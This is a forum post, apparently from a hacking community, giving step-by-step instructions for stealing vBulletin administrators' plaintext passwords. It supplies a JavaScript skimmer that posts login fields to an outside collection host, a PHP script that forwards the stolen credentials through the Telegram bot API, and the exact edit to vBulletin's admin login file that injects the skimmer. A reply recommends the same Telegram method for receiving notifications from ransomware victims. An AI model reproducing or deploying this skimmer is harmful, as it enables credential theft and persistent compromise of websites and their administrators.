[vBulletin]: How to steal vBulletin admins password

Hello,

if you ever had the access to a server hosting a vBulletin forum, you would probably be able to access the admin panel by grabbing the database password from the config files, then change the admin encrypted password by your encrypted password from the database to access the admin panel, but probably you’ll be out the server pretty soon.

but there’s a better solution which’s getting the admin plain text password, by a phishing attack or stealing his password using JavaScript, which I’ll be cover in this topic.

we could use PHP and get the password after the post request but vBulletin encrypts the password with MD5 using JavaScript in the Client Side, so we’ll try to grab the password before it gets encrypted.

the script I’ll be using is:

function mal()
{
	var xhr = new XMLHttpRequest();
	xhr.open("POST", "http://example/admindata.php", true);
	xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
	xhr.send("Data="+document.getElementById("vb_login_username").value + " " + document.getElementById("vb_login_password").value);
}

the given script grabs the password and sends it to a PHP script which then writes it to a file or sends it to you using telegram or with email, an example using telegram API:

<?php

if ($_SERVER['REQUEST_METHOD'] == "POST" && isset($_POST['Data']))
{
$token = "YOUR_TOKEN";
file_get_contents("https://api.telegram.org/bot$token/sendMessage? 
chat_id=YOUR_CHAT_ID&text=" . urlencode($_POST['Data'])."" );
}
else
    header("Location: https://google.com");
?>

so now you can upload the PHP script on the same server or your server, or you can send the passwords directly from the JavaScript.

now we’ll have to edit the index page and add our JavaScript script to it and edit somethings to get everything done.

the index page is located in: ./core/includes/adminfunctions.php

add the javascript script inside a tag, and edit this line :

<input type="submit" class="button" value="  <?php echo 
$vbphrase['log_in']; ?>  " accesskey="s" tabindex="3" /> 

to:

<input type="submit" onclick="mal()" class="button" value="  <?php echo 
$vbphrase['log_in']; ?>  " accesskey="s" tabindex="3" />

and now wait for admins passwords, that’s it, peace out!

1 Like

Using Telegram Bot to get instant notifications is a very good method, You can use this for other things eg; Receiving push notifications from ransomware victims

1 Like